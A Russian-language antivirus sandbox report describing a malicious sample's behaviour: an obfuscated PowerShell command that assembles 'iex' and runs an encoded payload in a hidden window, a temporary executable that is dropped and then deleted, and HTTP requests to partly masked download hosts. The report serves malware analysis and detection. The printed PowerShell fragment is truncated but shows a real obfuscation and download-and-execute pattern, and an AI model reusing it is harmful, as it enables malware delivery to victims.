Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $VERBoSepRefEreNce.tostrING()[1,3]+'X'-joIn'') ( [StrInG]::joIn( '' , ( '96J29w44@39m121A42>33@51w105A43J38z46w33J39A48w100I10A33w48<106w19I33z38!7w40A45J33>42<48m127<96@46A43A62A121J99A44J...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\611.exe
Удаляет следующие файлы
- %TEMP%\611.exe
Сетевая активность
Подключается к
- 'be###senbas.com':80
- 'he######otectionplans.com':80
- 'he######otectionplans.com':443
- 'bo##sync.ir':80
TCP
Запросы HTTP GET
- http://www.be###senbas.com/hs2Jv5Y/
- http://he######otectionplans.com/e3Se04G/
- http://www.bo##sync.ir/tQseO/
- http://bo##sync.ir/tQseO/
Другие
- 'he######otectionplans.com':443
UDP
- DNS ASK be###senbas.com
- DNS ASK he######otectionplans.com
- DNS ASK ho###taynew.com
- DNS ASK bo##sync.ir
- DNS ASK ba###alias.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' & ( $VERBoSepRefEreNce.tostrING()[1,3]+'X'-joIn'') ( [StrInG]::joIn( '' , ( '96J29w44@39m121A42>33@51w105A43J38z46w33J39A48w100I10A33w48<106w19I33z38!7w40A45J33>42<48m127<96@46A43A62A121J99A44J...' (со скрытым окном)
